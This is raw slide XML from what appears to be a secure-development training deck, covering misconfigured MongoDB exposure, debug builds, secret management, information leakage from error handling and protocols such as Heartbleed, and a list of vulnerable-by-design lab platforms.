                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The default configuration does not require any authentication to access</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Every few months, researchers publish lists of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hundreds of thousands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of open </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MongoDB instances. Many of them </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>containing production data!</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1040" name="Google Shape;1040;p149"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="470325"/>
            <a:ext cx="4044900" cy="9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MongoDB</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1041" name="Google Shape;1041;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="40362"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4698775" y="645376"/>
            <a:ext cx="4280726" cy="1312924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1042" name="Google Shape;1042;p149"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4746338" y="2232900"/>
            <a:ext cx="4185600" cy="67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Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>ZoomEye &amp; Shodan are services that can search for open network services exposed onto the Internet</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1043" name="Google Shape;1043;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="-50875"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4746350" y="3025896"/>
            <a:ext cx="4280725" cy="27036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DEBUG Builds</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1049" name="Google Shape;1049;p150"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="8520600" cy="12303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DEBUG builds of software often disable security controls</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Duo’s iOS Application DEBUG build disables all certificate validation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If this build were to be released, all users would be susceptible to a Man-in-the-Middle attack</a:t>
            </a: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sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1050" name="Google Shape;1050;p150"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1415550" y="2287400"/>
            <a:ext cx="6161202" cy="218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Lab Resources</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="907" name="Google Shape;907;p133"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="8586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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>highly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> encouraged that as part of your curriculum, hands-on labs are given across the training to help attendees gain a direct, technical understanding of topics being shared. This will maximize their engagement and increase learning.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>Below are a list of potential lab resources that may be beneficial to consider:</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Hunter2 Community</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (Hosts Duo’s own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>lab module contributions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> for free)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Juice Shop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> extremely popular vulnerable-by-design web service</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OWASP WebGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> provides a lesson-based capability along with hacking</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Google Gruyere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> is an older set of challenges but still widely applicable today </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>flAWS.cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>flAWS2.cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> focused on AWS-centric security challenges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51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="6122700" cy="3580800"/>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r>
              <a:rPr lang="en" b="1"/>
              <a:t>Don’t use default secrets or credentials</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Read the documentation to know where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" i="1"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> secrets need to be configured, because software may not force you to do so</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Spend the time setting up different secrets for prod/dev/test</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Don’t store secrets in repositories</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Production secrets should never be committed to a repository</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Ansible Vault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - Store credentials in encrypted files rather than playbooks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Kubernetes Secrets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- Encrypted blobs available to containers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Be aware of hard-coded secrets!</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Developers may add “debug” or “recovery” credentials</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Ensure debug or developer mode is off in production</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Review these settings before you hit ship!</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1056" name="Google Shape;1056;p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pic>
        <p:nvPicPr>
          <p:cNvPr id="1057" name="Google Shape;1057;p151"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6500350" y="1363449"/>
            <a:ext cx="2413625" cy="2416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52"/>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Information Leakage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Information Leakage?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068" name="Google Shape;1068;p153"/>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dirty="0"/>
              <a:t>A weakness that reveals sensitive information, such as credentials, logging information, metadata, or details about infrastructure and users</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Caused by a number of factors</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Badly designed or engineered protocols</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Secrets committed to source control</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Bad error handling that returns stack traces</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Reduced security on development instances/environments</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1069" name="Google Shape;1069;p153"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6026249" y="3217053"/>
            <a:ext cx="2806049" cy="135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54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="3866700" cy="9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Information Leakage from Error Handling</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1075" name="Google Shape;1075;p154"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834050" y="1361337"/>
            <a:ext cx="3998249" cy="2998675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1076" name="Google Shape;1076;p154"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1457575"/>
            <a:ext cx="3773700" cy="278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Error handlers for web frameworks often return stack traces and other sensitive data</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Information Leakage from Protocols</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p155"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="59163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One of the most well-known vulnerabilities in recent years, Heartbleed, was an information disclosure due to leaking a vulnerable server’s memory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Affected 17% of the HTTPS servers on the Internet, including big companies (e.g. Facebook)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Led to compromised SSL private keys, user credentials, and other sensitive information</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
